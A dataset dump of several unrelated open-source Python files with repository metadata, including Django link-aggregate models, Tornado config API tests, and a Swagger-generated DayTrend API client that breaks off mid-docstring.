|
2019-12-05T13:14:45.000Z
|
2022-03-13T18:22:00.000Z
|
extlinks/aggregates/models.py
|
WikipediaLibrary/externallinks
|
6519719a8b01ab121bf77c465c587af3762e99af
|
[
"MIT"
] | 97
|
2019-07-01T14:42:51.000Z
|
2022-03-29T04:09:34.000Z
|
extlinks/aggregates/models.py
|
suecarmol/externallinks
|
388771924f0e0173237393226cb7549a02ae40e3
|
[
"MIT"
] | 8
|
2019-12-03T01:52:41.000Z
|
2020-08-19T00:26:46.000Z
|
from django.db import models
from django.core.exceptions import ValidationError
from extlinks.organisations.models import Collection, Organisation
class LinkAggregate(models.Model):
class Meta:
app_label = "aggregates"
indexes = [
models.Index(fields=["full_date"]),
models.Index(fields=["collection"]),
models.Index(fields=["organisation"]),
]
organisation = models.ForeignKey(Organisation, on_delete=models.CASCADE)
collection = models.ForeignKey(
Collection, on_delete=models.CASCADE, blank=False, null=False
)
day = models.PositiveIntegerField()
month = models.PositiveIntegerField()
year = models.PositiveIntegerField()
full_date = models.DateField()
total_links_added = models.PositiveIntegerField()
total_links_removed = models.PositiveIntegerField()
on_user_list = models.BooleanField(default=False)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
def save(self, *args, **kwargs):
self.day = self.full_date.day
self.month = self.full_date.month
self.year = self.full_date.year
if self.pk is None:
self.full_clean(validate_unique=True)
super().save(*args, **kwargs)
def validate_unique(self, *args, **kwargs):
super(LinkAggregate, self).validate_unique(*args, **kwargs)
if self.__class__.objects.filter(
organisation=self.organisation,
collection=self.collection,
full_date=self.full_date,
on_user_list=self.on_user_list,
).exists():
raise ValidationError(
message="LinkAggregate with this combination (organisation, collection, full_date, on_user_list) already exists.",
code="unique_together",
)
class UserAggregate(models.Model):
class Meta:
app_label = "aggregates"
indexes = [
models.Index(fields=["full_date"]),
models.Index(fields=["collection"]),
models.Index(fields=["organisation"]),
]
organisation = models.ForeignKey(Organisation, on_delete=models.CASCADE)
collection = models.ForeignKey(
Collection, on_delete=models.CASCADE, blank=False, null=False
)
username = models.CharField(max_length=235)
day = models.PositiveIntegerField()
month = models.PositiveIntegerField()
year = models.PositiveIntegerField()
full_date = models.DateField()
total_links_added = models.PositiveIntegerField()
total_links_removed = models.PositiveIntegerField()
on_user_list = models.BooleanField(default=False)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
def save(self, *args, **kwargs):
self.day = self.full_date.day
self.month = self.full_date.month
self.year = self.full_date.year
if self.pk is None:
self.full_clean(validate_unique=True)
super().save(*args, **kwargs)
def validate_unique(self, *args, **kwargs):
super().validate_unique(*args, **kwargs)
if self.__class__.objects.filter(
organisation=self.organisation,
collection=self.collection,
username=self.username,
full_date=self.full_date,
on_user_list=self.on_user_list,
).exists():
raise ValidationError(
message="UserAggregate with this combination (organisation, collection, username, full_date, on_user_list) already exists.",
code="unique_together",
)
class PageProjectAggregate(models.Model):
class Meta:
app_label = "aggregates"
indexes = [
models.Index(fields=["full_date"]),
models.Index(fields=["collection"]),
models.Index(fields=["organisation"]),
]
organisation = models.ForeignKey(Organisation, on_delete=models.CASCADE)
collection = models.ForeignKey(
Collection, on_delete=models.CASCADE, blank=False, null=False
)
project_name = models.CharField(max_length=32)
page_name = models.CharField(max_length=255)
day = models.PositiveIntegerField()
month = models.PositiveIntegerField()
year = models.PositiveIntegerField()
full_date = models.DateField()
total_links_added = models.PositiveIntegerField()
total_links_removed = models.PositiveIntegerField()
on_user_list = models.BooleanField(default=False)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
def save(self, *args, **kwargs):
self.day = self.full_date.day
self.month = self.full_date.month
self.year = self.full_date.year
if self.pk is None:
self.full_clean(validate_unique=True)
super().save(*args, **kwargs)
def validate_unique(self, *args, **kwargs):
super().validate_unique(*args, **kwargs)
if self.__class__.objects.filter(
organisation=self.organisation,
collection=self.collection,
project_name=self.project_name,
page_name=self.page_name,
full_date=self.full_date,
on_user_list=self.on_user_list,
).exists():
raise ValidationError(
message="PageProjectAggregate with this combination (organisation, collection, project_name, page_name, full_date, on_user_list) already exists.",
code="unique_together",
)
| 37.604027
| 162
| 0.659825
| 598
| 5,603
| 5.978261
| 0.147157
| 0.053706
| 0.033566
| 0.035245
| 0.892028
| 0.841958
| 0.841958
| 0.841958
| 0.841958
| 0.841958
| 0
| 0.001868
| 0.235588
| 5,603
| 148
| 163
| 37.858108
| 0.832827
| 0
| 0
| 0.806202
| 0
| 0
| 0.092629
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.046512
| false
| 0
| 0.023256
| 0
| 0.395349
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9a6bcaf42692e310dc142762f867f7428785be47
| 119
|
py
|
Python
|
data/micro-benchmark/decorators/nested/main.py
|
vitsalis/pycg-evaluation
|
ce37eb5668465b0c17371914e863d699826447ee
|
[
"Apache-2.0"
] | 121
|
2020-12-16T20:31:37.000Z
|
2022-03-21T20:32:43.000Z
|
data/micro-benchmark/decorators/nested/main.py
|
vitsalis/pycg-evaluation
|
ce37eb5668465b0c17371914e863d699826447ee
|
[
"Apache-2.0"
] | 24
|
2021-03-13T00:04:00.000Z
|
2022-03-21T17:28:11.000Z
|
data/micro-benchmark/decorators/nested/main.py
|
vitsalis/pycg-evaluation
|
ce37eb5668465b0c17371914e863d699826447ee
|
[
"Apache-2.0"
] | 19
|
2021-03-23T10:58:47.000Z
|
2022-03-24T19:46:50.000Z
|
def dec(f):
return f
def func():
def dec(f):
return f
@dec
def inner():
pass
func()
| 9.153846
| 16
| 0.453782
| 17
| 119
| 3.176471
| 0.411765
| 0.222222
| 0.259259
| 0.481481
| 0.518519
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.420168
| 119
| 12
| 17
| 9.916667
| 0.782609
| 0
| 0
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.444444
| false
| 0.111111
| 0
| 0.222222
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
|
0
| 7
|
d01475b7b2ff72446fbbac93ff7a1c97ebffb2e4
| 152
|
py
|
Python
|
notebooks/data-prep/config.py
|
HPI-Information-Systems/TimeEval
|
9b2717b89decd57dd09e04ad94c120f13132d7b8
|
[
"MIT"
] | 2
|
2022-01-29T03:46:31.000Z
|
2022-02-14T14:06:35.000Z
|
notebooks/data-prep/config.py
|
HPI-Information-Systems/TimeEval
|
9b2717b89decd57dd09e04ad94c120f13132d7b8
|
[
"MIT"
] | null | null | null |
notebooks/data-prep/config.py
|
HPI-Information-Systems/TimeEval
|
9b2717b89decd57dd09e04ad94c120f13132d7b8
|
[
"MIT"
] | null | null | null |
data_raw_folder = "/home/projects/akita/data/benchmark-data/data-raw"
data_processed_folder = "/home/projects/akita/data/benchmark-data/data-processed"
| 50.666667
| 81
| 0.815789
| 22
| 152
| 5.454545
| 0.363636
| 0.116667
| 0.3
| 0.383333
| 0.733333
| 0.733333
| 0.733333
| 0.733333
| 0
| 0
| 0
| 0
| 0.039474
| 152
| 2
| 82
| 76
| 0.821918
| 0
| 0
| 0
| 0
| 0
| 0.684211
| 0.684211
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
d04fcf61c379ceb0f7e8fc287381cb8f01f2baf0
| 491
|
py
|
Python
|
phoila/__init__.py
|
datalayer-contrib/phoila
|
f8ff5f0a1f807829b57deae9f72bed91908258ad
|
[
"BSD-3-Clause"
] | 10
|
2019-08-09T14:45:49.000Z
|
2020-03-30T12:48:05.000Z
|
phoila/__init__.py
|
datalayer-contrib/phoila
|
f8ff5f0a1f807829b57deae9f72bed91908258ad
|
[
"BSD-3-Clause"
] | 9
|
2019-08-09T17:07:45.000Z
|
2019-10-22T18:22:09.000Z
|
phoila/__init__.py
|
datalayer-contrib/phoila
|
f8ff5f0a1f807829b57deae9f72bed91908258ad
|
[
"BSD-3-Clause"
] | 5
|
2019-08-09T17:57:53.000Z
|
2019-10-22T12:14:14.000Z
|
#!/usr/bin/env python
# coding: utf-8
# Copyright (c) Vidar Tonaas Fauske.
# Distributed under the terms of the Modified BSD License.
from ._version import __version__, version_info
def load_jupyter_server_extension(nb_server_app):
# Wrap this here to avoid pulling in webapp in a normal run
from .server_extension import _load_jupyter_server_extension
_load_jupyter_server_extension(nb_server_app)
def _jupyter_server_extension_paths():
return [{"module": "phoila"}]
| 25.842105
| 64
| 0.778004
| 70
| 491
| 5.085714
| 0.657143
| 0.210674
| 0.247191
| 0.219101
| 0.207865
| 0.207865
| 0.207865
| 0
| 0
| 0
| 0
| 0.002398
| 0.150713
| 491
| 18
| 65
| 27.277778
| 0.851319
| 0.374745
| 0
| 0
| 0
| 0
| 0.039735
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.166667
| 0.833333
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
d0567b824e9a22b6de4e6f96cdb67ccb0d8a7c4b
| 5,994
|
py
|
Python
|
nebula/tests/test_config_custom.py
|
threathunterX/nebula_web
|
2e32e6e7b225e0bd87ee8c847c22862f12c51bb1
|
[
"Apache-2.0"
] | 2
|
2019-05-01T09:42:32.000Z
|
2019-05-31T01:08:37.000Z
|
nebula/tests/test_config_custom.py
|
threathunterX/nebula_web
|
2e32e6e7b225e0bd87ee8c847c22862f12c51bb1
|
[
"Apache-2.0"
] | 1
|
2021-06-01T23:30:04.000Z
|
2021-06-01T23:30:04.000Z
|
nebula/tests/test_config_custom.py
|
threathunterX/nebula_web
|
2e32e6e7b225e0bd87ee8c847c22862f12c51bb1
|
[
"Apache-2.0"
] | 5
|
2019-05-14T09:30:12.000Z
|
2020-09-29T04:57:26.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from sqlalchemy.orm import sessionmaker
from nebula.views import config
from nebula.dao.config_dao import ConfigCustDao, ConfigDefaultDao
from base import WebTestCase, wsgi_safe, Auth_Code
configs = [
{
"last_modified": 1497421508806,
"value": "did",
"key": "sniffer.did.keyset"
}
]
# global application scope. create Session class, engine
Session = sessionmaker()
@wsgi_safe
class TestCustomConfigListHandler(WebTestCase):
def get_handlers(self):
return [(r"/platform/config", config.ConfigListHandler)]
@classmethod
def setUpClass(cls):
super(TestCustomConfigListHandler, cls).setUpClass()
cls.default_dao = ConfigDefaultDao()
cls.custom_dao = ConfigCustDao()
cls.default_dao.clear()
cls.custom_dao.clear()
def tearDown(self):
self.default_dao.clear()
self.custom_dao.clear()
def test_add_configs(self):
for c in configs:
self.default_dao.add_config(c['key'], c['value'])
url = "/platform/config?auth={}".format(Auth_Code)
post_args = json.dumps(configs)
response = self.fetch(url, method='POST', body=post_args)
res = json.loads(response.body)
self.assertEqual(res['status'], 0)
self.assertEqual(res['msg'], 'ok')
self.assertEqual(self.custom_dao.count(), 1)
def test_get_configs(self):
for c in configs:
self.default_dao.add_config(c['key'], c['value'])
self.custom_dao.add_config(c['key'], c['value'])
url = "/platform/config?auth={}".format(Auth_Code)
response = self.fetch(url)
res = json.loads(response.body)
self.assertEqual(res['status'], 0)
self.assertEqual(res['msg'], 'ok')
self.assertEqual(len(res['values']), 1)
def test_delete_configs(self):
for c in configs:
self.custom_dao.add_config(c['key'], c['value'])
url = "/platform/config?auth={}".format(Auth_Code)
response = self.fetch(url, method='DELETE')
res = json.loads(response.body)
self.assertEqual(res['status'], 0)
self.assertEqual(res['msg'], 'ok')
self.assertEqual(self.custom_dao.count(), 0)
class TestCustomConfigPropertiesHandler(WebTestCase):
def get_handlers(self):
return [(r"/platform/configproperties", config.ConfigPropertiesHandler)]
@classmethod
def setUpClass(cls):
super(TestCustomConfigPropertiesHandler, cls).setUpClass()
cls.default_dao = ConfigDefaultDao()
cls.custom_dao = ConfigCustDao()
cls.default_dao.clear()
cls.custom_dao.clear()
def tearDown(self):
self.default_dao.clear()
self.custom_dao.clear()
def test_add_configproperties(self):
configproperties = "\n".join(
["{}={}".format(_["key"], _["value"]) for _ in configs])
url = "/platform/configproperties?auth={}".format(Auth_Code)
response = self.fetch(url, method='POST', body=configproperties)
res = json.loads(response.body)
self.assertEqual(res['status'], 0)
self.assertEqual(res['msg'], 'ok')
self.assertEqual(self.custom_dao.count(), 1)
def test_get_configproperties(self):
for c in configs:
self.default_dao.add_config(c['key'], c['value'])
self.custom_dao.add_config(c['key'], c['value'])
configproperties = "\n".join(
["{}={}".format(_["key"], _["value"]) for _ in configs])
url = "/platform/configproperties?auth={}".format(Auth_Code)
response = self.fetch(url)
self.assertEqual(response.body, configproperties)
def test_delete_configproperties(self):
for c in configs:
self.custom_dao.add_config(c['key'], c['value'])
url = "/platform/configproperties?auth={}".format(Auth_Code)
response = self.fetch(url, method='DELETE')
res = json.loads(response.body)
self.assertEqual(res['status'], 0)
self.assertEqual(res['msg'], 'ok')
self.assertEqual(self.custom_dao.count(), 0)
class TestCustomConfigHandler(WebTestCase):
def get_handlers(self):
return [(r"/platform/config/(.*)", config.ConfigHandler)]
@classmethod
def setUpClass(cls):
super(TestCustomConfigHandler, cls).setUpClass()
cls.default_dao = ConfigDefaultDao()
cls.custom_dao = ConfigCustDao()
cls.default_dao.clear()
cls.custom_dao.clear()
def tearDown(self):
self.default_dao.clear()
self.custom_dao.clear()
def test_add_config(self):
url = "/platform/config/{}?auth={}".format(
configs[0]['key'], Auth_Code)
post_args = json.dumps(configs[0])
response = self.fetch(url, method="POST", body=post_args)
res = json.loads(response.body)
self.assertEqual(res['status'], 0)
self.assertEqual(res['msg'], 'ok')
self.assertEqual(self.custom_dao.count(), 1)
def test_get_config(self):
for c in configs:
self.default_dao.add_config(c['key'], c['value'])
self.custom_dao.add_config(c['key'], c['value'])
url = "/platform/config/{}?auth={}".format(
configs[0]['key'], Auth_Code)
response = self.fetch(url)
res = json.loads(response.body)
self.assertEqual(res['status'], 0)
self.assertEqual(res['msg'], 'ok')
self.assertEqual(len(res['values']), 1)
def test_delete_config(self):
for c in configs:
self.custom_dao.add_config(c['key'], c['value'])
url = "/platform/config/{}?auth={}".format(
configs[0]['key'], Auth_Code)
response = self.fetch(url, method='DELETE')
res = json.loads(response.body)
self.assertEqual(res['status'], 0)
self.assertEqual(res['msg'], 'ok')
self.assertEqual(self.custom_dao.count(), 0)
| 33.864407
| 80
| 0.619453
| 699
| 5,994
| 5.184549
| 0.130186
| 0.103477
| 0.07947
| 0.035872
| 0.813466
| 0.786976
| 0.786976
| 0.75745
| 0.745309
| 0.745309
| 0
| 0.007362
| 0.229563
| 5,994
| 176
| 81
| 34.056818
| 0.777393
| 0.01635
| 0
| 0.726619
| 0
| 0
| 0.103343
| 0.051247
| 0
| 0
| 0
| 0
| 0.179856
| 1
| 0.129496
| false
| 0
| 0.035971
| 0.021583
| 0.208633
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d0594825bfb56f90c5cef5a8c91e4bfecd645256
| 89
|
py
|
Python
|
automate/__main__.py
|
alexflorez/test_api_cypress
|
bda6bf113bf861afbd9226c8a04e7bab0f2aebaf
|
[
"BSD-3-Clause"
] | null | null | null |
automate/__main__.py
|
alexflorez/test_api_cypress
|
bda6bf113bf861afbd9226c8a04e7bab0f2aebaf
|
[
"BSD-3-Clause"
] | null | null | null |
automate/__main__.py
|
alexflorez/test_api_cypress
|
bda6bf113bf861afbd9226c8a04e7bab0f2aebaf
|
[
"BSD-3-Clause"
] | null | null | null |
from automate import install_cypress, run_api_server
install_cypress()
run_api_server()
| 17.8
| 52
| 0.853933
| 13
| 89
| 5.384615
| 0.615385
| 0.4
| 0.485714
| 0.571429
| 0.742857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.089888
| 89
| 4
| 53
| 22.25
| 0.864198
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
d08f7d68fe6e75f8d652d41f8644b192b4c876ca
| 47,292
|
py
|
Python
|
timelight_ai_python_api_client/api/day_trend_api.py
|
timelight-ai/python-api-client
|
7e14341a89e8b7e1b4b0730416f6ddd3ef66ef39
|
[
"MIT"
] | null | null | null |
timelight_ai_python_api_client/api/day_trend_api.py
|
timelight-ai/python-api-client
|
7e14341a89e8b7e1b4b0730416f6ddd3ef66ef39
|
[
"MIT"
] | null | null | null |
timelight_ai_python_api_client/api/day_trend_api.py
|
timelight-ai/python-api-client
|
7e14341a89e8b7e1b4b0730416f6ddd3ef66ef39
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
timelight
This is the timelight api. # noqa: E501
OpenAPI spec version: 1.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from timelight_ai_python_api_client.api_client import ApiClient
class DayTrendApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def v1_day_trend_bulk_post(self, generated_day_trend_bulk_dto, **kwargs): # noqa: E501
"""Create many DayTrend # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_day_trend_bulk_post(generated_day_trend_bulk_dto, async_req=True)
>>> result = thread.get()
:param async_req bool
:param GeneratedDayTrendBulkDto generated_day_trend_bulk_dto: (required)
:return: list[DayTrend]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.v1_day_trend_bulk_post_with_http_info(generated_day_trend_bulk_dto, **kwargs) # noqa: E501
else:
(data) = self.v1_day_trend_bulk_post_with_http_info(generated_day_trend_bulk_dto, **kwargs) # noqa: E501
return data
def v1_day_trend_bulk_post_with_http_info(self, generated_day_trend_bulk_dto, **kwargs): # noqa: E501
"""Create many DayTrend # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_day_trend_bulk_post_with_http_info(generated_day_trend_bulk_dto, async_req=True)
>>> result = thread.get()
:param async_req bool
:param GeneratedDayTrendBulkDto generated_day_trend_bulk_dto: (required)
:return: list[DayTrend]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['generated_day_trend_bulk_dto'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method v1_day_trend_bulk_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'generated_day_trend_bulk_dto' is set
if ('generated_day_trend_bulk_dto' not in params or
params['generated_day_trend_bulk_dto'] is None):
raise ValueError("Missing the required parameter `generated_day_trend_bulk_dto` when calling `v1_day_trend_bulk_post`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'generated_day_trend_bulk_dto' in params:
body_params = params['generated_day_trend_bulk_dto']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['bearer'] # noqa: E501
return self.api_client.call_api(
'/v1/day-trend/bulk', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[DayTrend]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def v1_day_trend_get(self, **kwargs): # noqa: E501
"""Retrieve many DayTrend # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_day_trend_get(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str fields: <h4>Selects fields that should be returned in the reponse body.</h4><i>Syntax:</i> <strong>?fields=field1,field2,...</strong> <br/><i>Example:</i> <strong>?fields=email,name</strong>
:param str filter: <h4>Adds fields request condition (multiple conditions) to the request.</h4><i>Syntax:</i> <strong>?filter=field||condition||value</strong><br/><i>Examples:</i> <ul><li><strong>?filter=name||eq||batman</strong></li><li><strong>?filter=isVillain||eq||false&filter=city||eq||Arkham</strong> (multiple filters are treated as a combination of AND type of conditions)</li><li><strong>?filter=shots||in||12,26</strong> (some conditions accept multiple values separated by commas)</li><li><strong>?filter=power||isnull</strong> (some conditions don't accept value)</li></ul><br/>Filter Conditions:<ul><li><strong><code>eq</code></strong> (<code>=</code>, equal)</li><li><strong><code>ne</code></strong> (<code>!=</code>, not equal)</li><li><strong><code>gt</code></strong> (<code>></code>, greater than)</li><li><strong><code>lt</code></strong> (<code><</code>, lower that)</li><li><strong><code>gte</code></strong> (<code>>=</code>, greater than or equal)</li><li><strong><code>lte</code></strong> (<code><=</code>, lower than or equal)</li><li><strong><code>starts</code></strong> (<code>LIKE val%</code>, starts with)</li><li><strong><code>ends</code></strong> (<code>LIKE %val</code>, ends with)</li><li><strong><code>cont</code></strong> (<code>LIKE %val%</code>, contains)</li><li><strong><code>excl</code></strong> (<code>NOT LIKE %val%</code>, not contains)</li><li><strong><code>in</code></strong> (<code>IN</code>, in range, <strong><em>accepts multiple values</em></strong>)</li><li><strong><code>notin</code></strong> (<code>NOT IN</code>, not in range, <strong><em>accepts multiple values</em></strong>)</li><li><strong><code>isnull</code></strong> (<code>IS NULL</code>, is NULL, <strong><em>doesn't accept value</em></strong>)</li><li><strong><code>notnull</code></strong> (<code>IS NOT NULL</code>, not NULL, <strong><em>doesn't accept value</em></strong>)</li><li><strong><code>between</code></strong> (<code>BETWEEN</code>, between, <strong><em>accepts two values</em></strong>)</li></ul>
:param str _or: <h4>Adds <code>OR</code> conditions to the request.</h4><i>Syntax:</i> <strong>?or=field||condition||value</strong><br/>It uses the same conditions as the filter parameter<br/><i>Rules and <i>Examples:</i></i><ul><li>If there is only <strong>one</strong> <code>or</code> present (without <code>filter</code>) then it will be interpreted as simple filter:</li><ul><li><strong>?or=name||eq||batman</strong></li></ul></ul><ul><li>If there are <strong>multiple</strong> <code>or</code> present (without <code>filter</code>) then it will be interpreted as a compination of <code>OR</code> conditions, as follows:<br><code>WHERE {or} OR {or} OR ...</code></li><ul><li><strong>?or=name||eq||batman&or=name||eq||joker</strong></li></ul></ul><ul><li>If there are <strong>one</strong> <code>or</code> and <strong>one</strong> <code>filter</code> then it will be interpreted as <code>OR</code> condition, as follows:<br><code>WHERE {filter} OR {or}</code></li><ul><li><strong>?filter=name||eq||batman&or=name||eq||joker</strong></li></ul></ul><ul><li>If present <strong>both</strong> <code>or</code> and <code>filter</code> in any amount (<strong>one</strong> or <strong>miltiple</strong> each) then both interpreted as a combitation of <code>AND</code> conditions and compared with each other by <code>OR</code> condition, as follows:<br><code>WHERE ({filter} AND {filter} AND ...) OR ({or} AND {or} AND ...)</code></li><ul><li><strong>?filter=type||eq||hero&filter=status||eq||alive&or=type||eq||villain&or=status||eq||dead</strong></li></ul></ul>
:param str sort: <h4>Adds sort by field (by multiple fields) and order to query result.</h4><i>Syntax:</i> <strong>?sort=field,ASC|DESC</strong><br/><i>Examples:</i></i><ul><li><strong>?sort=name,ASC</strong></li><li><strong>?sort=name,ASC&sort=id,DESC</strong></li></ul>
:param str join: <h4>Receive joined relational objects in GET result (with all or selected fields).</h4><i>Syntax:</i><ul><li><strong>?join=relation</strong></li><li><strong>?join=relation||field1,field2,...</strong></li><li><strong>?join=relation1||field11,field12,...&join=relation1.nested||field21,field22,...&join=...</strong></li></ul><br/><i>Examples:</i></i><ul><li><strong>?join=profile</strong></li><li><strong>?join=profile||firstName,email</strong></li><li><strong>?join=profile||firstName,email&join=notifications||content&join=tasks</strong></li><li><strong>?join=relation1&join=relation1.nested&join=relation1.nested.deepnested</strong></li></ul><strong><i>Notice:</i></strong> <code>id</code> field always persists in relational objects. To use nested relations, the parent level MUST be set before the child level like example above.
:param float per_page: <h4>Receive <code>N</code> amount of entities.</h4><i>Syntax:</i> <strong>?per_page=number</strong><br/><i>Example:</i> <strong>?per_page=10</strong>
:param float offset: <h4>Offset <code>N</code> amount of entities.</h4><i>Syntax:</i> <strong>?offset=number</strong><br/><i>Example:</i> <strong>?offset=10</strong>
:param float page: <h4>Receive a portion of <code>limit</code> entities (alternative to <code>offset</code>). Will be applied if <code>limit</code> is set up.</h4><i>Syntax:</i> <strong>?page=number</strong><br/><i>Example:</i> <strong>?page=2</strong>
:param float cache: <h4>Reset cache (if was enabled) and receive entities from the DB.</h4><i>Usage:</i> <strong>?cache=0</strong>
:return: list[DayTrend]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.v1_day_trend_get_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.v1_day_trend_get_with_http_info(**kwargs) # noqa: E501
return data
def v1_day_trend_get_with_http_info(self, **kwargs): # noqa: E501
"""Retrieve many DayTrend # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_day_trend_get_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str fields: <h4>Selects fields that should be returned in the reponse body.</h4><i>Syntax:</i> <strong>?fields=field1,field2,...</strong> <br/><i>Example:</i> <strong>?fields=email,name</strong>
:param str filter: <h4>Adds fields request condition (multiple conditions) to the request.</h4><i>Syntax:</i> <strong>?filter=field||condition||value</strong><br/><i>Examples:</i> <ul><li><strong>?filter=name||eq||batman</strong></li><li><strong>?filter=isVillain||eq||false&filter=city||eq||Arkham</strong> (multiple filters are treated as a combination of AND type of conditions)</li><li><strong>?filter=shots||in||12,26</strong> (some conditions accept multiple values separated by commas)</li><li><strong>?filter=power||isnull</strong> (some conditions don't accept value)</li></ul><br/>Filter Conditions:<ul><li><strong><code>eq</code></strong> (<code>=</code>, equal)</li><li><strong><code>ne</code></strong> (<code>!=</code>, not equal)</li><li><strong><code>gt</code></strong> (<code>></code>, greater than)</li><li><strong><code>lt</code></strong> (<code><</code>, lower that)</li><li><strong><code>gte</code></strong> (<code>>=</code>, greater than or equal)</li><li><strong><code>lte</code></strong> (<code><=</code>, lower than or equal)</li><li><strong><code>starts</code></strong> (<code>LIKE val%</code>, starts with)</li><li><strong><code>ends</code></strong> (<code>LIKE %val</code>, ends with)</li><li><strong><code>cont</code></strong> (<code>LIKE %val%</code>, contains)</li><li><strong><code>excl</code></strong> (<code>NOT LIKE %val%</code>, not contains)</li><li><strong><code>in</code></strong> (<code>IN</code>, in range, <strong><em>accepts multiple values</em></strong>)</li><li><strong><code>notin</code></strong> (<code>NOT IN</code>, not in range, <strong><em>accepts multiple values</em></strong>)</li><li><strong><code>isnull</code></strong> (<code>IS NULL</code>, is NULL, <strong><em>doesn't accept value</em></strong>)</li><li><strong><code>notnull</code></strong> (<code>IS NOT NULL</code>, not NULL, <strong><em>doesn't accept value</em></strong>)</li><li><strong><code>between</code></strong> (<code>BETWEEN</code>, between, <strong><em>accepts two values</em></strong>)</li></ul>
